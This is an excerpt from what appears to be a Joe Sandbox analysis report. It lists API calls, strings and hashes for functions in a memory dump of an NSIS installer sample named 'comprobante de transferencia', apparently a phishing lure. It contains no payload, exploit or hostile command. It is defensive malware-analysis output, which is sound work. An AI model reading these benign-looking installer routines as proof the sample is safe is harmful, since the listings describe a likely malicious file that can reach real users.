Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00403C06 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
ShowWindow.USER32(?), ref: 00403C5F
DestroyWindow.USER32 ref: 00403C73
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
GetDlgItem.USER32(?,?), ref: 00403CB0
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
IsWindowEnabled.USER32(00000000), ref: 00403CCB
GetDlgItem.USER32(?,?), ref: 00403D79
GetDlgItem.USER32(?,00000002), ref: 00403D83
SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
GetDlgItem.USER32(?,00000003), ref: 00403E94
ShowWindow.USER32(00000000,?), ref: 00403EB5
EnableWindow.USER32(?,?), ref: 00403EC7
EnableWindow.USER32(?,?), ref: 00403EE2
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
EnableMenuItem.USER32(00000000), ref: 00403EFF
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
SetWindowTextW.USER32(?,004226E8), ref: 00403F67
ShowWindow.USER32(?,0000000A), ref: 0040409B

Strings

&B, xrefs: 00403F3F

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: &B
API String ID: 184305955-3208460036
Opcode ID: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
Opcode Fuzzy Hash: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403863 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421

lstrcatW.KERNEL32(00436000,004226E8), ref: 004038E4
lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76BF3420), ref: 00403964
lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
GetFileAttributesW.KERNEL32(004271A0), ref: 00403982
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 004039CB

Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E

RegisterClassW.USER32(004281A0), ref: 00403A08
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
ShowWindow.USER32(00000005,00000000), ref: 00403A8B
GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
RegisterClassW.USER32(004281A0), ref: 00403ACD
DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC

Strings

RichEdit, xrefs: 00403ABE
RichEd32, xrefs: 00403A9F
.DEFAULT\Control Panel\International, xrefs: 004038CF
RichEdit20W, xrefs: 00403AAF, 00403AB5
Control Panel\Desktop\ResourceLocale, xrefs: 00403897
.exe, xrefs: 00403971
_Nb, xrefs: 004039E7, 00403A4F
RichEd20, xrefs: 00403A91
&B, xrefs: 0040388F

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
API String ID: 1975747703-1918744475
Opcode ID: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
Opcode Fuzzy Hash: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040427B Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
GetDlgItem.USER32(?,000003E8), ref: 0040432D
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
GetSysColor.USER32(?), ref: 0040435B
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
lstrlenW.KERNEL32(?), ref: 0040437C
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
GetDlgItem.USER32(?,0000040A), ref: 004043F7
SendMessageW.USER32(00000000), ref: 004043FE
GetDlgItem.USER32(?,000003E8), ref: 00404429
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
SetCursor.USER32(00000000), ref: 0040447D
ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
SetCursor.USER32(00000000), ref: 004044A1
SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2

Strings

open, xrefs: 0040448A
N, xrefs: 00404417

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405D49 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85

Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96

GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
wsprintfA.USER32 ref: 00405DC0
GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
GlobalFree.KERNEL32(00000000), ref: 00405EA9
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0

Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15

Strings

[Rename], xrefs: 00405E2A, 00405E3C
%ls=%ls, xrefs: 00405DB6
NUL, xrefs: 00405D52

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
Opcode Fuzzy Hash: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00404579 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045C8
SetWindowTextW.USER32(00000000,?), ref: 004045F2
SHBrowseForFolderW.SHELL32(?), ref: 004046A3
CoTaskMemFree.OLE32(00000000), ref: 004046AE
lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 004046E0
lstrcatW.KERNEL32(?,004271A0), ref: 004046EC
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE

Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756

Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
Part of subcall function 004062AE: CharNextW.USER32(?,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
Part of subcall function 004062AE: CharPrevW.USER32(?,?,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338

GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC

Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2

Strings

A, xrefs: 0040469C
&B, xrefs: 00404676

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$&B
API String ID: 2624150263-2586977930
Opcode ID: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
Opcode Fuzzy Hash: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040603C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 004060FF
GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 0040617D
GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406190
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 004061DA
CoTaskMemFree.OLE32(?), ref: 004061E5
lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 00406263

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040614B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406203

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
Opcode Fuzzy Hash: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DEE Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00434000,00403500,?), ref: 00402E1B

Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00402E67

Strings

Error launching installer, xrefs: 00402E3E
soft, xrefs: 00402EDC
Null, xrefs: 00402EE5
Inst, xrefs: 00402ED3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
Opcode Fuzzy Hash: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404145 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404162
GetSysColor.USER32(00000000), ref: 0040417E
SetTextColor.GDI32(?,00000000), ref: 0040418A
SetBkMode.GDI32(?,?), ref: 00404196
GetSysColor.USER32(?), ref: 004041A9
SetBkColor.GDI32(?,?), ref: 004041B9
DeleteObject.GDI32(?), ref: 004041D3
CreateBrushIndirect.GDI32(?), ref: 004041DD

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1

Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405179 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
Opcode Fuzzy Hash: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68

Uniqueness

Uniqueness Score: -1.00%

Function 00404A43 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
GetMessagePos.USER32 ref: 00404A66
ScreenToClient.USER32(?,?), ref: 00404A80
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8

Strings

f, xrefs: 00404A94

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

